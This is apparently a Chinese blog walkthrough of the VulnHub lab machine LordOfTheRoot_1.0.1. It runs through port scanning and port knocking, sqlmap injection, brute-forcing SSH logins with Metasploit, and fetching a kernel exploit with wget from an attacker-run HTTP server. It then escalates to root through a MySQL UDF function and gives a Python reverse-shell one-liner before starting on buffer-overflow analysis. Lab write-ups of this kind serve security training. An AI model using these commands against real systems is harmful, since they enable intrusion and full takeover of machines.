LordOfTheRoot_1.0.1

namp简单使用

namp 192.168.5.0/24 -sP      探测目标主机存活情况
namp 192.168.5.0/24 -O      识别操作系统


namp 192.168.5.153 -sS -sV -A -T4 -p-
-p-     全端口扫描 1-65535 但是比较耗时间
-sS     SYN扫描,只完成三次握手前两次,很少有系统记入日志,默认使用,需要root(admin)权限
-sV     探测端口号版本
-A      全面系统检查,使用脚本检测,扫描等
-T4     针对TCP端口进制动态扫描延迟重10ms


得到 22 端口 ssh 操作系统linux3.X|4.X

ssh查看

ssh ssh@192.168.5.153

发现提示 knock Easy as 1,2,3 意思是敲击三次,端口碰撞

端口碰撞

protknocking

端口试探(pork knocking)是一种通过连接尝试,从外部打开原先关闭端口的方法
一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机
端口试探的主要目的是防治攻击者通过端口扫描的方式对主机进行攻击
端口试探类似于一次密码握手协议,比如一种最基本的方式:发送一定序列的udp tcp数据包
当运行在主机上的daemon程序捕捉到数据包之后,如果这个序列正确,则开启相应的端口,或者防火墙允许客户端通过
由于对外的linux服务器通过限制ip地址的方式来控制访问,因此可以利用这个端口试探的方式来进行防火墙对于访问ip控制

要求

端口碰撞要求知道端口碰撞的序列,否则爆破机会很小
Easy as 1,2,3 碰撞序列为1,2,3

knock

apt install knockd
man knock
knock 192.168.5.153 1 2 3 -v


nmap 192.168.5.153 -sS -sV -A -T4 -p-

端口碰撞后开启的端口 只有碰撞的主机ip可以访问,其他未碰撞主机还是无法访问.发现开启了1337端口

robots.txt文件

sqlmap注入

抓个包sqlmap跑一下

sqlmap -o -u http://192.168.5.153:1337/978345210/index.php --forms --batch --dbs --fresh-querie
-------------
Optimization
-o:开启所有优化开关
--predict-output:预测常见的查询输出
--keep-alive:使用持久的HTTP(S)连接
--null-connection:从没有实际的HTTP响应体中检索页面长度--threads=THREADS:设置请求的并发数
--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试
-------------

sqlmap -r s.txt --batch --current-db


sqlmap -r s.txt --batch -D Webapp --tables

ssh爆破

hydra爆破ssh

msf爆破ssh

若有用户名和密码字段的话,使用auxiliary/scanner/ssh/ssh_login模块.若不知道,使用auxiliary/scanner/shh/ssh_enumusers模块先探测用户名是否存在

https://blog.csdn.net/huweiliyi/article/details/105590291

msfconsole


search ssh_login


use 0

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OvNTKG1n-1665283160098)(C:/Users/14980/AppData/Roaming/Typora/typora-user-images/image-20220421143536165.png)]

show options


set rhost 192.168.5.153
set user_file users.txt
set pass_file passwd.txt
exploit


sessions -i
sessions 3
id

提权

exp提权

ssh登录

ssh smeagol@192.168.5.153
MyPreciousR00t


id
uname -a    查看主机操作系统 内核信息
hostnamectl


smeagol@LordOfTheRoot:~$ id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
smeagol@LordOfTheRoot:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
smeagol@LordOfTheRoot:~$ hostnamectlStatic hostname: LordOfTheRootIcon name: computer-vmChassis: vmBoot ID: 5bd2fb73a2ea4cd4b96b83a803062787Operating System: Ubuntu 14.04.3 LTSKernel: Linux 3.19.0-25-genericArchitecture: i686

https://www.exploit-db.com/exploits/39166

使用exploit

background   返回msf
y


searchsploit 39166       在kali本地exploit库搜索


locate linux/local/39166.c   查看位置


cp /usr/share/exploitdb/exploits/linux/local/39166.c ./wanan 复制

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-le9YjJ2r-1665283160101)(C:/Users/14980/AppData/Roaming/Typora/typora-user-images/image-20220421150527324.png)]

python2 -m SimpleHTTPServer 8081 开启http服务


wget http://192.168.5.152:8081/39166.c   下载exp


gcc 39177.c -o 39166

udf提权

条件

  • root 权限运行mysql
  • 在mysql 5.5 之前secure_file_priv 默认是空,这个情况下可以像任意路径写文件
  • 在mysql 5.5 之后 secure_file_priv 默认是NULL 这个情况下不可以写文件
  • udf.dll文件必须防止在mysql安装目录的lib\plugin文件下才可以创建自定义函数

mysql版本,权限

dpkg -l | grep mysql 查看历史安装包版本
5.5.44


ps aux | grep mysql  查看mysql进程信息
root 权限

mysql 密码

cd /var/www/978345210/
ls
cat login.php


用户名      root
密码      darkshadow
mysql -u root -p

查看能否udf提权

show global variables like 'secure%';

可以提权

show variables like 'plugin%';

查看能否远程登录

use mysql;
select user,host from user;
不能远程登录


MySQL中,BLOB是一个二进制大型对象,是一个可以存储大量数据的容器,它能容纳不同大小的数据。
BLOB类型实际是个类型系列(TinyBlob、Blob、MediumBlob、LongBlob)
除了在存储的最大信息量上不同外,他们是等同的。MySQL的四种BLOB类型:
类型           大小(单位:字节)
TinyBlob      最大 255
Blob          最大 65K
MediumBlob    最大 16M
LongBlob      最大 4G 可以利用lib_mysqludf_sys提供的函数执行系统命令,lib_mysqludf_sys:
sys_eval,执行任意命令,并将输出返回
sys_exec,执行任意命令,并将退出码返回。或者udf exploit提佛那个的函数执行系统命令
do_system 本次使用lib_mysqludf_sys

locate lib_mysqludf_sys 查看lib_mysqludf_sys位置


cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so ./
mv lib_mysqludf_sys_32.so udf.so    重命名
du udf.so   看大小
python2 -m SimpleHTTPServer 8081    起服务


cd /tmp
wget http://192.168.5.152:8081/udf.so   下载到/tmp目录下


mysql -u root -p
create table udf (line blob); 创建,用于存放本地传来的udf文件的内容.
insert into udf values(load_file('/tmp/udf.so')); 在表中写入udf文件内容
select * from udf into dumpfile'/usr/lib/mysql/plugin/udf.so'; #
将udf文件内容传入新建的udf.so文件中,路径根据自己的@@basedir修改
create function sys_eval returns string soname 'udf.so';  创建自定义函数
select * from mysql.func;   查看函数
select sys_eval('chmod u+s /usr/bin/find');
调用sys_eval函数来给find命令所有者的suid权限,使其可以执行root命令
exit


find / -exec '/bin/sh' \; 执行提权/ !此时是没有框架的 要是想反弹shell 需要有框架
// python -c "import pty;pty.spawn(\"/bin/bash\")"  获得框架
// 现在主机用 nc 监听端口有  nc -lvp port
// 在使用反弹shell命令进行反弹
// python 反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("监听主机ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'cd /root
ls
cat Flag.txt

缓冲区(buff) 看不懂

https://blog.csdn.net/WHHLS/article/details/123860109

标准函数
stycpy() strcat() sprintf() vsprintf() gets() scanf()

ALSR

SECRET文件夹目录 是缓冲区溢出的一个标志目录

find / -name SECRET 2>/dev/null  其中2>/dev/null 忽略警告值

在该目录下发现三个子目录每一个子目录有一个file文件

有的缓冲区会设置ALSRJ机制 即随机化

0 = 关闭
1 = 半随机 共享库 栈 mmap() 以及VDSO 将被随机化
2 = 全随机
cat /proc/sys/kernel/randomize_va_space 查看
2 全随机

根据文件夹大小来判断 两个为7.2k 一个为5.1k 5.1k是主要文件 由于会随机变化 将目录用base64编码 在转码保存到攻击机

vim base64.txt
gedit base64.txt
cat base64.txt | base64 -d > file


chmod u+x file  给文件执行权
使用python命令快速模糊判断多少个字符会导致程序崩溃.python有-c参数,允许代码直接从shell执行
./file $(python2 -c 'print "A" * 100')

GDB-peda

GDB进行分析
apt install gdb
git clone https://github.com/longld/peda.git
echo "source ~/wanan/peda/peda.py" >> ~/.gdbinit    想要用某一个插件的时候,只要输入对应命令就行!
gdb file    gdb分析file文件


/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000  当我们不确定界址时 可以生成乱码进行填充

vulnhub靶场之 LordOfTheRoot_1.0.1相关推荐

  1. VulnHub靶场之CH4INRULZ_v1.0.1

    下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 主机发现 netdiscover -i eth0 -r 192.16 ...

  2. Vulnhub靶场渗透-CH4INRULZ_v1.0.1

    前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3 ...

  3. VulnHub靶场之BBS (cute): 1.0.1

    VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2, ...

  4. vulnhub靶场-Hacker_Kid-v1.0.1

    1.靶机信息 靶机名称:Hacker_Kid-v1.0.1 靶机难度:中等 虚拟机环境:此靶机推荐使用Virtualbox搭建 目标:取得root权限 靶机地址:https://download.vu ...

  5. Vulnhub靶场——Hacker_Kid-v1.0.1

    1.概要 靶机下载地址:https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova 攻击机地址:192.168.60.148 靶机地址:1 ...

  6. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  7. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  8. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  9. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

最新文章

  1. centos环境变量设置
  2. XCODE 所有DeviceSupport
  3. python mysqldb cursor_python中MySQLdb模块用法实例
  4. 神经进化是深度学习的未来
  5. mes二次开发可以用c++吗_可以用水洗单反镜头吗
  6. 为什么AI需要的是角色扮演,而不是象棋和围棋?
  7. 重SQL开发和重 Java开发比较
  8. 禅道下载与安装教程(完整版)
  9. md文件转换为pdf文件(带目录和不带目录简捷操作)
  10. 【测试沉思录】7. 测试左移的一点思考
  11. word中域代码与题注的结合实现自动编号和超简便交叉引用
  12. ​【原型设计】8种原型设计工具介绍​
  13. PPT内置宏教程——放映时用控件切换动态图表
  14. 毕业设计 : 基于Spark的海量新闻文本聚类 - Spark 新闻分类 文本分类新闻聚类
  15. matlab幂函数回归分析,求助matlab种幂函数回归 这样的:
  16. 鸿蒙秘境怎么玩,鸿蒙秘境
  17. eclipse如何写python_(怎么用eclipse写python)python eclipse 使用教程
  18. 电磁兼容(EMC)基础(二)
  19. html制作心形状图片,HTML5 Canvas实现玫瑰曲线和心形图案的代码实例
  20. 我是一个怎样的人,我可以提供什么价值

热门文章

  1. java中文编程_Java中文编程开发
  2. 准Z源逆变器模型预测控制Simulink仿真
  3. BitLocker恢复
  4. 超级牛bi的软件工具大全 珍藏版【人手一份】
  5. 深度学习------pytorch,RNN:句子预测,股票预测
  6. 从 Paxos 到 Raft,分布式一致性算法解析
  7. 用 Python 从 GFF3 格式文件中查找注释信息
  8. PRML 2.1 二元变量
  9. office2007版本信息
  10. JQuery 基础 jq选择器 dom操作